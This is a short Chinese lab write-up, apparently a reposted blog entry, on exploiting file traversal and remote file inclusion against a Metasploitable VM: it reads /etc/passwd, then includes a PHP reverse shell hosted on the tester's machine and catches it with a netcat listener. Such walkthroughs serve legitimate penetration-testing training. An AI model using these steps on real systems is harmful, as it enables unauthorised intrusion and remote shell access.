title: 文件遍历漏洞实验 tags: web渗透 categories: 渗透测试
-
环境搭建 测试机ip:192.168.86.135 靶机metasploittable的ip:192.168.86.128 靶机编辑php.ini文件
sudo vim /etc/php5/cgi/php.ini //编辑php配置文件
找到allow_url_include这一行把Off改成On,
sudo /etc/init.d/apache2 restart //重启apache服务
-
发起攻击
-
尝试文件
/etc/passwd
遍历查看,成功。 -
尝试定位url链接,成功
-
测试机开启apache服务,制作php反弹shell,使其定位其链接http://192.168.86.135/1.php
cp /url/share/webshells/php/php-reverse-shell.php /var/www/html/1.php //复制成1.php到web目录下 vim 1.php //修改127.0.0.1成测试机ip完成保存 service apache2 start //开启apache服务<br> nc -nvvlp 1234 //nc开启监控端口
转载:https://blog.csdn.net/weixin_41217671/article/details/102489307
查看评论